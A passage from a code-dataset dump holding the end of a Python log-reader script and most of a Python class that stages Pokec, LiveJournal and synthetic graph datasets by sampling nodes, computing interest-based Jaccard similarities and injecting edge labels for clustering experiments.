Defaults to True.\n :return: String of text from log file.\n \"\"\"\n with open(file_path) as f:\n for line in f.readlines():\n if strip:\n # Remove newline characters\n line = line.rstrip()\n yield line\n\n\nif __name__ == \"__main__\":\n # Construct the argument parser and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-p\", \"--path\", required=True,\n help=\"base path to Rana log files\")\n args = vars(ap.parse_args())\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"564195764","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\nimport itertools\nimport json\nimport math\nimport os\nfrom random import Random\nfrom timeit import default_timer\nfrom urllib.parse import quote_plus\n\nfrom dataReadWrite.ReadWriteAll import ALGORITHMS\nfrom graphDataAnalysis.GraphDataStagerException import GraphDataStagerException\nfrom graphDataAnalysis.GraphLabels import GraphLabels\nfrom lib import comb, IntToStrDict, reverse_dict\n\nALGO_NAMES = set(ALGORITHMS.keys()) | {\"autohds-g\"} # set for nice repr\n\n\nclass GraphDataStager:\n\n DATA_NAMES = {\n \"pokec\": {\n \"max_interest_len\": 20,\n \"min_interest_occurrence\": 2,\n \"label_inject_fraction\": 0.5, # percentage that is injected into graph\n \"data_alpha\": 0.0,\n \"sum_edges\": True,\n \"k_regularization\": 2,\n \"save_autoHDS-G_native_format\": False,\n \"interests_file_name\": \"soc-pokec-profiles.txt\",\n \"network_file_name\": \"soc-pokec-relationships.txt\"\n },\n \"livejournal\": {\n \"min_interest_occurrence\": 500,\n \"label_inject_fraction\": 0.5, # percentage that is injected into graph\n \"data_alpha\": 0.0,\n \"sum_edges\": True,\n \"k_regularization\": 2,\n \"save_autoHDS-G_native_format\": False,\n \"interests_file_name\": \"com-lj.all.cmty.txt\",\n \"network_file_name\": \"com-lj.ungraph.txt\"\n },\n \"sim2_partitional\": {\n \"save_autoHDS-G_native_format\": True\n },\n \"sim2_edge\": {\n \"num_edge_labels\": False, # False for exhaustive, else int\n \"save_autoHDS-G_native_format\": True\n },\n \"socialbot\": {\n \"save_autoHDS-G_native_format\": False\n }\n }\n\n COMMUNITY_DATA_SETS = {\"pokec\", \"livejournal\"} # todo: check if thats the right way to do it\n\n def __init__(self, staging_dir, data_name, experiment_name, seed, num_points_sample,\n sim_threshold, max_edges, debug, label_inject_fraction):\n\n # must be in valid data names\n if data_name not in GraphDataStager.DATA_NAMES:\n raise GraphDataStagerException(\"Valid data set names: {}, received: {}\"\n .format(set(GraphDataStager.DATA_NAMES.keys()), data_name))\n\n if data_name in GraphDataStager.COMMUNITY_DATA_SETS:\n self.generate_method = \"_generate_graph_and_labels_communities\"\n else:\n self.generate_method = \"_generate_graph_and_labels_\" + data_name\n\n # check if the method exists for that data name\n if hasattr(GraphDataStager, self.generate_method) and callable(getattr(GraphDataStager, self.generate_method)):\n print(\"Found method: {} for datasets {}\"\n .format(self.generate_method, data_name))\n else:\n raise GraphDataStagerException(\n \"Could not find a valid method {} for data name {}, please add\"\n \" in the GraphDataStager class!\"\n .format(self.generate_method, data_name)\n )\n\n # TODO: this is a hack because we had to change this very often to optimize external dataset runs\n if (label_inject_fraction is not None) and (data_name in 
GraphDataStager.COMMUNITY_DATA_SETS):\n if (label_inject_fraction > 1.0) or (label_inject_fraction < 0.0):\n raise GraphDataStagerException(\"Invalid label_inject_fraction passed, must be between 0 and 1. Got: {}\"\n .format(label_inject_fraction))\n self.DATA_NAMES[data_name][\"label_inject_fraction\"] = label_inject_fraction\n\n self.data_name = data_name\n self.experiment_name = experiment_name\n\n # example, pokec root dir\n self.input_data_dir = os.path.join(staging_dir, data_name)\n # input_data_dir must exist\n if not os.path.exists(self.input_data_dir):\n raise GraphDataStagerException(\"Input data dir path: {} not found!\".format(self.input_data_dir))\n\n # example, pokec/node_100k.n_1.li_0.1\n self.output_data_dir = os.path.join(self.input_data_dir, experiment_name)\n\n if not os.path.exists(self.output_data_dir):\n os.makedirs(self.output_data_dir)\n\n self.graph_file_path = os.path.join(self.output_data_dir, \"graph\")\n self.labels_file_path = os.path.join(self.output_data_dir, \"labels\")\n\n self.sim_threshold = sim_threshold\n\n if self.sim_threshold >= 0:\n print(\"Similarity threshold: {}\".format(self.sim_threshold))\n else:\n raise GraphDataStagerException(\"Similarity threshold must be >= 0! Recieved: {}\"\n .format(self.sim_threshold))\n\n self.num_points_sample = num_points_sample\n # seed values so that same data will come each time with specific seed\n self.random = Random(seed)\n self.max_edges = max_edges\n self.debug = debug\n\n # create data set dir if not already there\n\n # set of all sampled vertices given a num_points_sample\n self.all_sample_nodes = set()\n\n # measurements related code this is computed lazily\n # do not access self._node_based_graph directly\n # access this through the property self.node_based_graph\n self._node_based_graph = None # dict: node ID -> (dict: node ID -> weight)\n\n # needed for edge based labels generation\n self.edge_labels = dict() # dict: (node ID 1, node ID 2) -> weight\n\n self.partitional_labels = dict() # dict: node ID -> cluster ID\n\n # edges for the graph dataset sampled for saving\n # format: dict of (node ID, node ID) -> weight\n self.graph = dict()\n\n # set of nodes that exist in self.graph\n self.graph_nodes = set()\n\n # string -> int ID mapping\n # if this remains None, no mapping file will be written (in cases where\n # there is no string ID)\n self.node_id_mapping = None\n\n def remove_disconnected_nodes(self):\n \"\"\"\n Filters out any unconnected nodes from the graph before it is saved.\n Mutates self.graph_nodes.\n \"\"\"\n num_nodes = len(self.graph_nodes)\n self.graph_nodes.clear()\n for node_a, node_b in self.graph:\n if node_a not in self.graph_nodes:\n self.graph_nodes.add(node_a)\n if node_b not in self.graph_nodes:\n self.graph_nodes.add(node_b)\n print(\"Removed {} disconnected nodes (Negative in case of data_alpha = 0)\"\n .format(num_nodes - len(self.graph_nodes)))\n\n def save_graph(self):\n \"\"\"\n save the generic generated graph (weighted)\n \"\"\"\n edge_count = 0\n with open(self.graph_file_path, \"w\") as graph_file:\n for (node1, node2), weight in self.graph.items():\n edge_count += 1\n if edge_count % 250000 == 0:\n print(\"Saved {} edges...\".format(edge_count))\n\n graph_file.write(\"{}\\t{}\\t{}\\n\".format(node1, node2, weight))\n print(\"Saved {} edges to file: {}\".format(edge_count, self.graph_file_path))\n\n def save_edge_labels(self):\n \"\"\"\n save the generic generated graph (weighted)\n \"\"\"\n edge_count = 0\n label_nodes = set()\n with open(self.labels_file_path, 
\"w\") as f:\n f.write(GraphLabels.LABEL_FORMAT_HEADERS[GraphLabels.LABEL_FORMAT.EDGE_BASED] + \"\\n\")\n for edge, weight in self.edge_labels.items():\n node_1, node_2 = edge\n if node_1 not in label_nodes:\n label_nodes.add(node_1)\n if node_2 not in label_nodes:\n label_nodes.add(node_2)\n edge_count += 1\n if edge_count % 250000 == 0:\n print(\"Saved {} edges ...\".format(edge_count))\n\n f.write(\"{}\\t{}\\t{}\\n\".format(float(weight), *edge))\n print(\"Saved {} nodes {} edges to label file: {}\".format(len(label_nodes), edge_count, self.labels_file_path))\n\n # TODO: add static method for saving partitional labels to file\n\n def _sample_nodes(self, all_nodes):\n \"\"\"\n Samples nodes based on sampling etc.\n \"\"\"\n # The all_nodes variable that is being passed (label nodes) is being iterated over later in the program, so\n # it is being saved as a copy if no sampling needed\n len_all_nodes = len(all_nodes)\n if self.num_points_sample is None:\n self.all_sample_nodes = all_nodes.copy()\n self.num_points_sample = len_all_nodes\n elif len_all_nodes < self.num_points_sample:\n print(\"Warning: shrunk number of nodes from {} to keep to the \"\n \"maximum since only {} nodes were found\".format(len_all_nodes, self.num_points_sample))\n self.num_points_sample = len_all_nodes\n self.all_sample_nodes = all_nodes.copy()\n elif len_all_nodes == self.num_points_sample:\n self.all_sample_nodes = all_nodes.copy()\n else:\n # sample nodes as asked for, for speed or desired dataset size by the user\n self.all_sample_nodes = set(self.random.sample(all_nodes, self.num_points_sample))\n\n print(\"Selected {} sampled nodes of {} nodes\".format(len(self.all_sample_nodes), len_all_nodes))\n\n @staticmethod\n def _filter_by_nodes(data, filter_by_nodes):\n \"\"\"\n Useful especially when testing and only part of a graph data file is\n loaded causing labels and graphs to be inconsistent.\n :param data: a dict or a set\n :return:\n \"\"\"\n\n if isinstance(data, set):\n ret_data = set()\n for node in data:\n if node in filter_by_nodes:\n ret_data.add(node)\n elif isinstance(data, dict):\n ret_data = dict()\n for node in data:\n if node in filter_by_nodes:\n ret_data[node] = data[node]\n else:\n raise GraphDataStagerException(\"Unsupported type for filtering: {}\".format(type(data)))\n\n print(\"Filtered down to {} entries from {}...\".format(len(ret_data), len(data)))\n return ret_data\n\n def generate_graph_and_labels(self):\n \"\"\"\n Wrapper that routes the call to the right hook for the dataset\n \"\"\"\n getattr(self, self.generate_method)()\n\n def _generate_sim2_graph(self):\n \"\"\"\n Loads the sim2 graph dataset removes any duplicates while loading by\n assuming graph is symmetrical.\n :return:\n \"\"\"\n\n # pass 1 get graph nodes\n all_nodes = set()\n with open(os.path.join(self.input_data_dir, \"graph.jsonl\")) as f:\n for line in f:\n node_id = json.loads(line)[\"id\"]\n all_nodes.add(node_id)\n\n self._sample_nodes(all_nodes)\n\n edges_processed = set()\n self.graph.clear()\n self.graph_nodes.clear()\n\n # pass 2 load the graph filter to sampled nodes\n with open(os.path.join(self.input_data_dir, \"graph.jsonl\")) as f:\n for line in f:\n line_dict = json.loads(line)\n node_id1 = line_dict[\"id\"]\n\n if node_id1 not in self.all_sample_nodes:\n continue\n\n for node_id2, weight in line_dict[\"connections\"]:\n if node_id2 not in self.all_sample_nodes:\n continue\n\n if node_id1 not in self.graph_nodes:\n self.graph_nodes.add(node_id1)\n if node_id2 not in self.graph_nodes:\n 
self.graph_nodes.add(node_id2)\n\n if node_id1 > node_id2:\n edge_id = (node_id2, node_id1)\n else:\n edge_id = (node_id1, node_id2)\n\n if edge_id in edges_processed:\n continue\n edges_processed.add(edge_id)\n self.graph[edge_id] = weight\n\n def _load_sim2_labels(self):\n labels = dict() # node ID -> cluster ID\n with open(os.path.join(self.input_data_dir, \"labels_background.clusters.jsonl\")) as f:\n for line in map(str.strip, f):\n if not line:\n continue\n\n line_dict = json.loads(line)\n node_id = line_dict[\"id\"]\n cluster_id = line_dict[\"label\"]\n level = line_dict[\"level\"]\n\n if level != 0:\n raise GraphDataStagerException(\"multi-level labels are not supported\")\n\n labels[node_id] = cluster_id\n\n return labels\n\n def _generate_graph_and_labels_sim2_partitional(self):\n \"\"\"\n development dataset sim2 with partitional labels\n :return:\n \"\"\"\n\n # graph\n self._generate_sim2_graph()\n # labels\n self.partitional_labels = self._load_sim2_labels()\n\n self.save_graph()\n\n with open(self.labels_file_path, \"w\") as f:\n f.write(GraphLabels.LABEL_FORMAT_HEADERS[GraphLabels.LABEL_FORMAT.CLUSTER_BASED] + \"\\n\")\n for node_id, cluster_id in self.partitional_labels.items():\n f.write(\"{}\\t{}\\n\".format(node_id, cluster_id))\n\n def _generate_graph_and_labels_sim2_edge(self):\n \"\"\"\n development dataset sim2 with edge-based labels\n :return:\n \"\"\"\n # graph\n self._generate_sim2_graph()\n # labels\n labels = self._load_sim2_labels()\n\n edge_labels = dict()\n\n if GraphDataStager.DATA_NAMES[\"sim2_edge\"][\"num_edge_labels\"] is False:\n # exhaustive labels\n\n sorted_graph_nodes = sorted(self.graph_nodes)\n\n for edge in itertools.combinations(sorted_graph_nodes, 2):\n # itertools.combinations of sorted list gives sorted tuples\n\n label_1 = labels[edge[0]]\n label_2 = labels[edge[1]]\n\n if label_1 == \"b\" or label_2 == \"b\":\n edge_labels[edge] = 0\n else:\n edge_labels[edge] = label_1 == label_2\n\n else:\n while len(edge_labels) < GraphDataStager.DATA_NAMES[\"sim2_edge\"][\"num_edge_labels\"]:\n\n if not len(edge_labels) % 10000 and len(edge_labels):\n print(\" {:,} of {:,} labels generated\".format(len(edge_labels), GraphDataStager.DATA_NAMES[\"sim2_edge\"][\"num_edge_labels\"]))\n\n node_id_1, node_id_2 = self.random.sample(self.graph_nodes, 2)\n\n if node_id_1 < node_id_2:\n edge = (node_id_1, node_id_2)\n else:\n edge = (node_id_2, node_id_1)\n\n if edge in edge_labels:\n continue\n\n label_1 = labels[node_id_1]\n label_2 = labels[node_id_2]\n\n if label_1 == \"b\" or label_2 == \"b\":\n edge_labels[edge] = 0\n else:\n edge_labels[edge] = label_1 == label_2\n\n self.edge_labels = edge_labels\n\n self.save_graph()\n self.save_edge_labels()\n\n def _load_community_interest_data(self):\n\n print(\"##### Loading community interest data for: {}\".format(self.data_name))\n start_time = default_timer()\n\n community_interests_path = os.path.join(self.input_data_dir, GraphDataStager.DATA_NAMES[self.data_name][\"interests_file_name\"])\n graph_index = dict() # node_id -> interest_set\n node_count = 0\n uniq_interests = defaultdict(int)\n frequent_interests = 0\n total_interests = 0\n min_freq = GraphDataStager.DATA_NAMES[self.data_name][\"min_interest_occurrence\"]\n\n if self.data_name not in GraphDataStager.DATA_NAMES:\n raise NotImplementedError(\"community dataset not implemented: {}\".format(self.data_name))\n\n with open(community_interests_path, \"r\") as interests_file:\n if self.data_name == \"pokec\":\n for line in interests_file:\n\n node_count += 
1\n if node_count % 100000 == 0:\n print(\"Found {} of {} nodes with interests...\".format(len(graph_index), node_count))\n\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n # Read pokec user node interests. Used to build the interests graph.\n # For each row, the second value is the user ID (node) and the\n # 12th value is the list of interests, comma delimited.\n # Some lines do not have data and some don't have data for interests.\n row_cols = line.split(\"\\t\")\n if len(row_cols) < 12:\n continue\n interests = row_cols[11].split(\", \")\n if len(interests) == 0:\n continue\n # prune empty interests\n interest_set = set()\n for interest in interests:\n if (len(interest.strip()) > 0) and (interest != \"null\") \\\n and (len(interest) < GraphDataStager.DATA_NAMES[self.data_name][\"max_interest_len\"]):\n interest_set.add(interest)\n total_interests += 1\n interest_set.add(interest)\n if len(interest_set) == 0:\n # interest_set is empty\n continue\n\n node_id = int(row_cols[0])\n\n graph_index[node_id] = interest_set\n\n # count interests with enough node frequency\n for interest, freq in uniq_interests.items():\n if freq >= min_freq:\n frequent_interests += 1\n\n elif self.data_name == \"livejournal\":\n # Load LiveJournal User Group Data (Used to Generate Data Graph)\n # Will generate a dict of user -> groups (graph_index) TODO: better name\n # Will generate a list of nodes with at least 2 groups (user_group_data_nodes)\n\n interest_id = 0\n\n for line in interests_file:\n interest_id += 1\n # the format nodes in a group joined by \\t\n nodes = {int(node) for node in line.split(\"\\t\")}\n if interest_id % 100000 == 0:\n print(\"Found {} nodes in {} interests with freq > {}...\"\n .format(len(graph_index), frequent_interests, min_freq))\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n total_interests += 1\n if len(nodes) < min_freq:\n continue\n\n frequent_interests += 1\n\n for node in nodes:\n if node not in graph_index:\n graph_index[node] = set()\n # converting the id to string allows us to use the same pipeline as pokec\n graph_index[node].add(str(interest_id))\n else:\n raise NotImplementedError(\"community dataset not implemented: {}\".format(self.data_name))\n\n # todo: fix print, gives 0 for both\n print(\"Done loading community interest data. 
Found {} unique interests, {} interests occuring with \"\n \"freq >= {}, (time={:.3f} s)\"\n .format(len(uniq_interests), frequent_interests, min_freq, default_timer() - start_time))\n print(\"Found {} nodes with interests before sampling.\".format(len(graph_index)))\n\n return graph_index\n\n def _generate_graph_and_labels_communities(self):\n \"\"\"\n * saves graph file to self.output_data_dir/graph\n * generates self.graph\n * generates self.graph_nodes\n * may generate self.node_id_mapping (depending on the data set)\n * Generates the labels file\n \"\"\"\n community_interests_path_cleaned = os.path.join(self.output_data_dir, \"profiles.cleaned.txt\")\n\n interest_graph_index = self._load_community_interest_data()\n community_networks_path = os.path.join(self.input_data_dir, GraphDataStager.DATA_NAMES[self.data_name][\"network_file_name\"])\n # load network graph to get set of nodes\n start_time = default_timer()\n\n print(\"##### Loading community network graph data (1) and getting nodes for: {}\".format(self.data_name))\n network_nodes = set()\n edge_count = 0\n with open(community_networks_path, \"r\") as graph_file:\n\n if self.data_name == \"livejournal\":\n # discard 4 header lines exclusive to livejournal\n for _ in range(4):\n next(graph_file)\n\n for edge in graph_file: # edge is \"[node1]\\t[node2]\"\n edge_count += 1\n if edge_count % 2500000 == 0:\n print(\"Found {} edges of network graph...\".format(edge_count))\n\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n # update nodes_in_graph with the two nodes in this edge\n node_1, node_2 = edge.split(\"\\t\")\n network_nodes.add(int(node_1))\n network_nodes.add(int(node_2))\n\n print(\"Done. (time={:.3f} s)\".format(default_timer() - start_time))\n print(\"Found {} nodes in network graph\".format(len(network_nodes)))\n\n intersecting_nodes = network_nodes.intersection(set(interest_graph_index.keys()))\n network_nodes = self._filter_by_nodes(network_nodes, intersecting_nodes)\n\n # For counting full size of interest graph before intersection, comment\n # next line and look at estimated graph size\n interest_graph_index = self._filter_by_nodes(interest_graph_index, intersecting_nodes)\n\n self._sample_nodes(network_nodes)\n\n # This is not the case, but check just to make sure to remove nodes not\n # in both network graph and interest graph.\n if len(network_nodes) != len(interest_graph_index):\n raise GraphDataStagerException(\"community data interests graph vs network graph have different nodes, \"\n \"need cleaning by removing extra ones in both\")\n\n # The math shows that if you are regularizing as N/(D+R) where R is reg\n # and N and D are # of shared tokens between posts vs total no.\n # token between them, then this is the min. of tokens each posts\n # need to have in order for their jaccard to be greater than the\n # desired threshold, this allows us to prune most of the pairs\n # (pre-filter)\n MIN_INTERESTS_NEEDED = math.ceil(self.sim_threshold * GraphDataStager.DATA_NAMES[self.data_name][\"k_regularization\"]\n / (1. 
- self.sim_threshold))\n\n # Populate node_id_mapping (string -> int) with all sample nodes so it\n # has the nodes in interest graph and network graph.\n self.node_id_mapping = dict()\n for node in self.all_sample_nodes:\n interests = interest_graph_index[node]\n # This allows us to view interests in geneDIVER.\n # Make interests shorter (for the ptDescription) to avoid long\n # interests when viewing URLs.\n str_node_id = \"{}:https://www.google.com/search?q={}\".format(\n node,\n quote_plus(\",\".join(interest[:5] for interest in sorted(interests)))\n )\n self.node_id_mapping[str_node_id] = node\n\n graph_rindex = dict() # dict: interest -> set of nodes\n # prune graph index\n # build reverse index for speed\n\n # how many nodes did we add in the interest reverse index\n all_interest_nodes = set()\n for node in network_nodes:\n if node in self.all_sample_nodes:\n # If this node doesn't have enough interests, it will never have\n # enough similarity (self.sim_threshold) due to\n # regularization with any node, so do not add to node\n # sample set and reverse index.\n if len(interest_graph_index[node]) < MIN_INTERESTS_NEEDED: # TODO: why isn't this being done before sampling\n self.all_sample_nodes.remove(node) # TODO: changed this\n del interest_graph_index[node]\n else:\n # Only add if sampled and meets MIN_TERMS_NEEDED\n for interest in interest_graph_index[node]:\n if interest not in graph_rindex:\n graph_rindex[interest] = set()\n graph_rindex[interest].add(node)\n if node not in all_interest_nodes:\n all_interest_nodes.add(node)\n else:\n del interest_graph_index[node]\n del network_nodes\n\n # Prune out all interests that don't connect at least min_interest_occurrence people as it is just dead noise.\n print(\"Pruning out interests that are occurring less than {} times, also \"\n \"pruning out nodes that have only that interest...\"\n .format(GraphDataStager.DATA_NAMES[self.data_name][\"min_interest_occurrence\"]))\n\n interest_prune_list = list()\n for interest in graph_rindex:\n if len(graph_rindex[interest]) < GraphDataStager.DATA_NAMES[self.data_name][\"min_interest_occurrence\"]:\n interest_prune_list.append(interest)\n for interest in interest_prune_list:\n for node in graph_rindex[interest]:\n interest_graph_index[node].remove(interest)\n if len(interest_graph_index[node]) == 0:\n del interest_graph_index[node]\n self.all_sample_nodes.remove(node)\n del graph_rindex[interest]\n\n print(\"Pruned to {} nodes, removed {} low frequency interests, left with {} unique interests\"\n .format(len(self.all_sample_nodes), len(interest_prune_list), len(graph_rindex)))\n print(\"Saving pruned interests in: {}\".format(community_interests_path_cleaned))\n with open(community_interests_path_cleaned, \"w\") as pcf:\n for node_id in interest_graph_index.keys():\n interest_list = \",\".join(sorted(interest_graph_index[node_id]))\n pcf.write(\"{}\\t{}\\n\".format(node_id, interest_list))\n\n # Save sample filtered network graph to staging dir.\n print(\"##### Loading community network data (2) and saving network graphe for sampled nodes.\")\n start_time = default_timer()\n edge_count = 0\n network_edge_count = 0\n edge_labels_nodes = set()\n\n with open(community_networks_path, \"r\") as graph_file:\n\n if self.data_name == \"livejournal\":\n # discard 4 header lines exclusive to livejournal\n for i in range(4):\n next(graph_file)\n\n for edge in map(str.strip, graph_file): # edge is \"[node1]\\t[node2]\"\n edge_count += 1\n if edge_count % 2500000 == 0:\n print(\"Found {} edges of network 
graph...\".format(edge_count))\n\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n # Update nodes_in_graph with the two nodes in this edge.\n node1, node2 = map(int, edge.split(\"\\t\"))\n\n # Filter out any node NOT in sample node set.\n if (node1 not in self.all_sample_nodes) or (node2 not in self.all_sample_nodes):\n continue\n\n if node1 > node2:\n edge_id = (node2, node1)\n else:\n edge_id = (node1, node2)\n\n self.edge_labels[edge_id] = 1\n if node1 not in edge_labels_nodes:\n edge_labels_nodes.add(node1)\n if node2 not in edge_labels_nodes:\n edge_labels_nodes.add(node2)\n network_edge_count += 1\n\n print(\"Done. (time={:.3f} s), saved {} edges to community graph\".format(default_timer() - start_time, network_edge_count))\n\n # load/generate graph into memory for algorithm to use later\n print(\"##### Generate interest graph with interest_graph_index and graph_rindex\")\n start_time = default_timer()\n\n # tracks edges already calculated in the filter-set of reverse index so as not to avoid duplicates\n edges_processed = set()\n self.graph.clear()\n saved_count = 0\n\n print(\"No. of nodes in graph ridx: {}\".format(len(all_interest_nodes)))\n nodes_found_in_ridx= set()\n # iterate over possible edges\n if GraphDataStager.DATA_NAMES[self.data_name][\"data_alpha\"] > 0:\n for interest, nodes in graph_rindex.items():\n for node_a, node_b in itertools.combinations(nodes, 2):\n if node_a not in nodes_found_in_ridx:\n nodes_found_in_ridx.add(node_a)\n if node_b not in nodes_found_in_ridx:\n nodes_found_in_ridx.add(node_b)\n\n # create sorted edge id to make sure (a, b) and (b, a) are deduped\n if node_a > node_b:\n edge_id = (node_b, node_a)\n else:\n edge_id = (node_a, node_b)\n\n if edge_id in edges_processed:\n continue\n edges_processed.add(edge_id)\n interests_a = interest_graph_index[node_a]\n interests_b = interest_graph_index[node_b]\n numerator = len(interests_a & interests_b)\n\n # if no. of shared interests is not >= MIN_TERMS_NEEDED this jaccard is going to be too small\n # skip denominator calc\n if numerator < MIN_INTERESTS_NEEDED:\n continue\n edge_jaccard = numerator / (len(interests_a | interests_b) +\n GraphDataStager.DATA_NAMES[self.data_name][\"k_regularization\"])\n if edge_jaccard < self.sim_threshold:\n continue\n\n self.graph[edge_id] = edge_jaccard\n # graph_nodes is a subset of all nodes in the graph.\n # Nodes not having a high enough jaccard with any other\n # node are going to be missing but they are present in\n # self.all_sample_nodes\n self.graph_nodes.add(node_a)\n self.graph_nodes.add(node_b)\n\n num_current_graph_nodes = len(self.graph_nodes)\n if saved_count % 100000 == 0:\n # Won't run on 0 because there will always be at least\n # 2 nodes.\n\n # edge_density is equal to ratio between the edges and\n # total amount of edges possible from the current\n # graph nodes.\n edge_density = saved_count / (num_current_graph_nodes * (num_current_graph_nodes - 1) // 2)\n\n # Number of edges expected by multiplying total amount\n # of edges possible from self.num_points_sample\n # Uses len(self.all_sample_nodes) instead of\n # self.num_sample because pruning removes almost\n # 40% of self.num_sample\n expected_number_of_edges = comb(len(all_interest_nodes), 2) * edge_density\n\n if expected_number_of_edges > self.max_edges * 1.25:\n raise GraphDataStagerException(\n \"Edges expected significantly higher than \"\n \"max_edges passed. Stopping program. 
\"\n \"Expected_number of edges {}, max edges \"\n \"allowed {}, edge_density: {}\"\n .format(expected_number_of_edges, self.max_edges, edge_density)\n )\n\n saved_count += 1\n\n # Modulo progress print\n if saved_count % 50000 == 0:\n print(\" Saved {} edges in {:.2f} seconds...\"\n .format(saved_count, default_timer() - start_time))\n print(\" Expected number of edges right now is {}\"\n .format(expected_number_of_edges))\n print(\"Found {} nodes in ridx so far, can have: {}\"\n .format(len(nodes_found_in_ridx), len(all_interest_nodes)))\n else:\n print(\"Skipping data jaccard graph computation as data_alpha weight is 0!\")\n print(\"Done. (time={:.3f} s), Produced {} edges for interests graph in memory\"\n .format(default_timer() - start_time, saved_count))\n\n # inject a fraction of the labels into graph\n print(\"#################### Injecting labels into graph with fraction of: {}\"\n .format(GraphDataStager.DATA_NAMES[self.data_name][\"label_inject_fraction\"]))\n\n sparse_injected_labels_jaccard_sum = 0 # combined jaccard of all injected labels that are also in the data graph\n all_injected_edges_count = 0 # total number of injected labels\n sparse_injected_edges_count = 0 # number of injected labels that are also in the data graph\n label_similarities_file_path = os.path.join(self.output_data_dir, \"label_similarities.tsv\")\n\n combined_graph_edges = set(self.edge_labels.keys())\n combined_graph_edges.update(self.graph.keys())\n num_combined_edges = len(combined_graph_edges)\n num_edges_saved = 0\n num_edges_processed = 0\n ticker_size = num_combined_edges // 10\n nodes_interesected_graph = set()\n\n with open(label_similarities_file_path, \"w\") as label_similarities_file:\n\n for edge_id in combined_graph_edges:\n num_edges_processed += 1\n\n if (num_edges_saved > 10) and (num_edges_processed % ticker_size == 0):\n fraction_edges_saved = num_edges_saved / num_edges_processed\n expected_num_edges = int(fraction_edges_saved * num_combined_edges)\n num_nodes = len(self.graph_nodes)\n edge_density_saved = num_edges_saved / (num_nodes * (num_nodes - 1) // 2)\n expected_dense_edges = expected_num_edges / edge_density_saved\n # general quadratic solution for number of nodes given number of edges in a dense graph:\n # num nodes = (1 + sqrt(1 + 8 * all_edges)) / 2\n expected_num_nodes = int((1 + (1 + 8 * expected_dense_edges)**0.5) / 2)\n\n print(\"Expected final size of graph: nodes: {}, edges:{}, if this is not what \"\n \"you want stop and restart!\".format(expected_num_nodes, expected_num_edges))\n\n if (self.random.random() <= GraphDataStager.DATA_NAMES[self.data_name][\"label_inject_fraction\"]) and \\\n (edge_id in self.edge_labels): # TODO: don't think this second condition needs to be here\n sample_label = True\n sample_edge_val = self.edge_labels[edge_id]\n else:\n sample_label = False\n sample_edge_val = 0.0\n\n node1, node2 = edge_id # edges already sorted\n\n\n if node1 not in nodes_interesected_graph:\n nodes_interesected_graph.add(node1)\n if node2 not in nodes_interesected_graph:\n nodes_interesected_graph.add(node2)\n\n # We want to skip processing this if it was neither in graph nor in sample label.\n if (edge_id not in self.graph) and (not sample_label):\n continue\n\n # compute jaccard if its missing in the graph\n # this could still be in the labels, but we only have to compute jaccard if it is not in the graph\n if edge_id not in self.graph:\n # it has to be in the label graph if its not in the data graph\n interests_a = interest_graph_index[node1]\n interests_b = 
interest_graph_index[node2]\n # edge_jaccard is guaranteed to be computable including\n # when it is 0 because all nodes in labels are also in\n # the data graph because of prefiltering.\n edge_jaccard = (len(interests_a & interests_b)\n / (len(interests_a | interests_b) + GraphDataStager.DATA_NAMES[self.data_name][\"k_regularization\"]))\n # add 1.0 to the jaccard value in the graph if its in the graph\n else:\n # it has to be in the original graph if its not in the edge_label graph\n edge_jaccard = self.graph[edge_id]\n if GraphDataStager.DATA_NAMES[self.data_name][\"sum_edges\"]:\n # compute sum of weights\n updated_edge_jaccard = edge_jaccard + sample_edge_val\n else:\n # when labels are 1/0 then alpha controls what fraction of contribution comes from data\n # when alpha is 0, the output graph is purely based on the label graph\n # when alpha is 1, the label is not used\n updated_edge_jaccard = (edge_jaccard * GraphDataStager.DATA_NAMES[self.data_name][\"data_alpha\"]\n + sample_edge_val * (1 - GraphDataStager.DATA_NAMES[self.data_name][\"data_alpha\"]))\n\n if updated_edge_jaccard < self.sim_threshold:\n if edge_id in self.graph:\n del self.graph[edge_id]\n continue\n\n num_edges_saved += 1\n\n if sample_label:\n del self.edge_labels[edge_id] # cannot have edge in self.graph and self.edge_labels\n all_injected_edges_count += 1\n if all_injected_edges_count % 1000 == 0:\n print(\"Injected {} edges...\".format(all_injected_edges_count))\n if edge_id not in self.graph:\n # only injected labels that are in the graph are added to the label_similarities_file\n label_similarities_file.write(\"{}\\t{}\\t{}\\n\".format(node1, node2, edge_jaccard))\n sparse_injected_labels_jaccard_sum += edge_jaccard\n sparse_injected_edges_count += 1\n # We don't need to update the interest_graph_index and\n # graph_rindex even though it would be invalid for\n # the new nodes being added here. Most of the nodes\n # will already be there.\n if node1 not in self.graph_nodes:\n self.graph_nodes.add(node1)\n if node2 not in self.graph_nodes:\n self.graph_nodes.add(node2)\n self.graph[edge_id] = updated_edge_jaccard\n \n print(\"Total number of nodes in the graph after label injection: {}\".format(len(self.graph_nodes)))\n if sparse_injected_edges_count == 0:\n print(\"No injected edges found in graph\")\n else:\n print(\"Sparse average label jaccard values: {}\"\n .format(sparse_injected_labels_jaccard_sum / sparse_injected_edges_count))\n if all_injected_edges_count == 0:\n print(\"No edges were injected into graph\")\n else:\n print(\"Full average label jaccard values: {}\"\n .format(sparse_injected_labels_jaccard_sum / all_injected_edges_count))\n\n self.remove_disconnected_nodes()\n # Add cannot_link labels to edge_lables\n\n print(\"Found {} total no. of nodes and {} edges in intersected graph\".format(len(nodes_interesected_graph), len(combined_graph_edges)))\n\n # this is not used any more! 
